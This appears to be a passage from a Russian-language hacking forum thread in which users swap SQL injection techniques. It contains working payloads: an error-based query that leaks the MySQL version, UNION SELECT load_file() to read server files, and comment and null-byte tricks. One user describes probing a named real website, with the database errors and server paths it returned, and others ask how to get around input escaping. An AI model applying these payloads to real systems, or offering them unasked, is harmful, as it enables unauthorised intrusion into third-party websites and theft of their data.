slayzer замени на это - +or(1,1)= (select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)
вот никак не могу раcкрутить http://www.turkishculturalfoundation.org//pages.php?ID=82 1) вставляю кавычку: http://www.turkishculturalfoundation.org//pages.php?ID=82' выводит ошибку (значит уязвимость есть) 2) использую вычитание http://www.turkishculturalfoundation.org//pages.php?ID=83-1 выводится другая страница (значит уязвимости нету) 3) применяю логику http://www.turkishculturalfoundation.org//pages.php?ID=82+AND+1=1 http://www.turkishculturalfoundation.org//pages.php?ID=82+AND+1=2 выводит ту же страницу, ничего не изменяется (значит уязвимости нету) хотел подобрать поля вообще не выводит ошибки=(применял order+by group+by union+select, заменял все думал фильтр, вставлял кавычки, применял and и тд. тп в id вывод: шо за......
и какое слово тут говорит что это не инъекция??? или вы сделали вывод из расчета: http://www.turkishculturalfoundation.org//pages.php?ID=83-1 http://www.turkishculturalfoundation.org//pages.php?ID=82+AND+1=1 http://www.turkishculturalfoundation.org//pages.php?ID=82+AND+1=2 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/www/users/turkish3/include/lib.php on line 117 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/www/users/turkish3/include/lib.php on line 117 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/www/users/turkish3/include/lib.php on line 117 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/www/users/turkish3/include/lib.php on line 79 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/www/users/turkish3/pages.php on line 297
Есть директория D:\site.ru\index.php Как прочитать этот файл через SQL-inj? +union+select+load_file('D:\site.ru\index.php')-- Или +union+select+load_file('D:/site.ru/index.php')-- ?
можно так: +union+select+load_file('D:/site.ru/index.php')-- можно и так: +union+select+load_file('D:\\site.ru\\index.php')--
привет посоветуйте как тут поступит: на запрос localhost/script.php?id=1'+order+by+1+--+ ответ: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+1+--+', now())' at line 2 вот никак не могу раскрутит еще добавка now())'
спс попугай но все еще остался now()) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', now())' at line 2
попробуй пробелы поставить до и\или после двух тире, либо /* заюзай, или нульбайтом отрежь на крайний случай. А вообще, похоже ошибка идет во втором запросе, видимо.
%23, #, /*. 1' order by 1,2,3,4,5,6,7,8,9,10,11,12 /* 1 order by 1,2,3,4,5,6,7,8,9,10,11,12 /* С ковычкой без и т.п.
Господа, есть варианты обхода экранирования ?) statement := 'SELECT * FROM users WHERE name = ' + QuoteParam(userName) + ';'; function QuoteParam(s : string) : string; { на входе — строка; на выходе — строка в кавычках и с заменёнными спецсимволами } var i : integer; Dest : string; begin Dest := '"'; for i:=1 to length(s) do case s of '''' : Dest := Dest + '\'''; '"' : Dest := Dest + '\"'; '\' : Dest := Dest + '\\'; else Dest := Dest + s; end; QuoteParam := Dest + '"'; end; + к переменной можно добавить intval()